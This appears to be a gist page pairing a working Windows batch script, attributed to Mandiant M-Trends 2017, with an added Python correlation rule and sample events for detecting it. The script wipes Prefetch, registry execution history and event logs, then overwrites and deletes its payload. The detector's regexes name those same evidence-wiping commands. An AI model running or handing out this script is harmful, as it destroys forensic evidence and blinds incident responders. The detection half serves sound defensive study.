Created January 6, 2018 22:16
Gist: mgeeky/3561be7e697c62f543910851c0a26d00
Batch script to hide malware execution on a Windows host: it wipes the Prefetch directory, empties the MUICache, RunMRU and UserAssist execution-history keys, clears the File Replication Service, Application, System and PowerShell event logs over WMI, and finally overwrites and deletes the payload passed as %1. Source: Mandiant M-Trends 2017. Note that the Security log is never touched, and that clearing a log makes the Event Log service write Event ID 104 ("The ... log file was cleared") to the System log; because the PowerShell log is cleared after System, that last 104 survives the wipe.
@echo off
:: Remove Prefetch files, which record which executables have run and when
del /f /q /s %windir%\prefetch\*
:: Empty the MUICache (XP-era ShellNoRoam path and the Vista+ Local Settings path),
:: Run-dialog history (RunMRU) and Explorer execution history (UserAssist)
reg delete "HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache" /va /f
reg delete "HKLM\Software\Microsoft\Windows\ShellNoRoam\MUICache" /va /f
reg delete "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache" /va /f
reg delete "HKLM\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache" /va /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" /va /f
:: Clear event logs through the Win32_NTEventLogFile WMI class (the Security log is left alone);
:: the WHERE clause is double-quoted so the name containing spaces survives cmd tokenisation
wmic nteventlog where "LogFileName='File Replication Service'" Call ClearEventlog
wmic nteventlog where "LogFileName='Application'" Call ClearEventlog
wmic nteventlog where "LogFileName='System'" Call ClearEventlog
wmic nteventlog where "LogFileName='PowerShell'" Call ClearEventlog
:: %1 is the payload that invoked this script: rename it, overwrite the renamed file with a copy
:: of regedit.exe to hinder carving, then delete it (the copy only lands on the renamed file
:: when %1 lives in the current directory)
ren %1 temp000 & copy /y %windir%\regedit.exe temp000 & del temp000
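The defensive counterpart to the script above is a correlation rule: any one of these actions (a Prefetch purge, a `reg delete` against MUICache or UserAssist, a log clear) is occasionally legitimate admin noise, but two or more from the same host within a few minutes is the script's signature. The following is an added example written for this page, not code from the gist or from M-Trends. It runs over constructed sample events shaped like Security 4688 / Sysmon 1 process-creation records and Event Log service "log cleared" records (104 in System, 1102 in Security); the field names `ts`, `Computer`, `EventID` and `CommandLine` and the host names are assumptions for the example.

```python
"""Correlate the artifact-wiping techniques used by the batch script into one alert.

Added example; not from the gist or from M-Trends.  Sample events are constructed.
"""
import re
from datetime import datetime, timedelta

# One regex per technique the script uses; matched case-insensitively against
# a process command line (Security 4688 / Sysmon 1).
TECHNIQUES = {
    "prefetch_wipe": re.compile(r"\bdel\b.*\\prefetch\\\*", re.I),
    "mru_wipe": re.compile(r"\breg\s+delete\b.*(muicache|userassist|runmru)", re.I),
    "eventlog_clear": re.compile(
        r"nteventlog.*cleareventlog|\bwevtutil\s+cl\b|clear-eventlog", re.I),
    # copy /y <path>\regedit.exe <target>: payload overwritten before deletion
    "payload_overwrite": re.compile(r"\bcopy\s+/y\s+\S*\\regedit\.exe\s+\S+", re.I),
}

# Written by the Event Log service itself when a log is cleared (104 in System,
# 1102 in Security), so a WMI ClearEventlog still leaves a trace.
LOG_CLEARED_IDS = {104, 1102}

WINDOW = timedelta(minutes=5)


def classify(event):
    """Return the set of technique names that a single event evidences."""
    found = set()
    for name, rx in TECHNIQUES.items():
        if rx.search(event.get("CommandLine", "")):
            found.add(name)
    if event.get("EventID") in LOG_CLEARED_IDS:
        found.add("eventlog_clear")
    return found


def detect(events, window=WINDOW, min_techniques=2):
    """Per host, alert when >= min_techniques distinct techniques fall inside one window."""
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["Computer"], []).append(ev)

    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        for i, anchor in enumerate(evs):
            techniques, matched = set(), []
            for ev in evs[i:]:
                if ev["ts"] - anchor["ts"] > window:
                    break
                hits = classify(ev)
                if hits:
                    techniques |= hits
                    matched.append(ev)
            if len(techniques) >= min_techniques:
                alerts.append({"host": host, "start": anchor["ts"],
                               "techniques": sorted(techniques), "events": matched})
                break  # one alert per host is enough for triage
    return alerts


def _t(s):
    return datetime.fromisoformat(s)


# Constructed sample telemetry (assumed field names), not real logs.
SAMPLE_EVENTS = [
    {"ts": _t("2018-01-06T22:16:01"), "Computer": "WS01", "EventID": 4688,
     "CommandLine": r"del /f /q /s C:\Windows\prefetch\*"},
    {"ts": _t("2018-01-06T22:16:02"), "Computer": "WS01", "EventID": 4688,
     "CommandLine": r'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" /va /f'},
    {"ts": _t("2018-01-06T22:16:03"), "Computer": "WS01", "EventID": 4688,
     "CommandLine": "wmic nteventlog where \"LogFileName='System'\" Call ClearEventlog"},
    {"ts": _t("2018-01-06T22:16:03"), "Computer": "WS01", "EventID": 104, "CommandLine": ""},
    {"ts": _t("2018-01-06T22:16:04"), "Computer": "WS01", "EventID": 4688,
     "CommandLine": r"cmd.exe /c ren dropper.exe temp000 & copy /y C:\Windows\regedit.exe temp000 & del temp000"},
    # A single log clear on another host with nothing around it: below threshold.
    {"ts": _t("2018-01-06T22:30:00"), "Computer": "SRV02", "EventID": 104, "CommandLine": ""},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["host"], a["start"], a["techniques"])
```

The threshold of two distinct techniques is what keeps a routine `wevtutil cl` or a disk-cleanup Prefetch purge from paging anyone; lower `min_techniques` to 1 only if you also restrict the rule to hosts where none of these actions are expected.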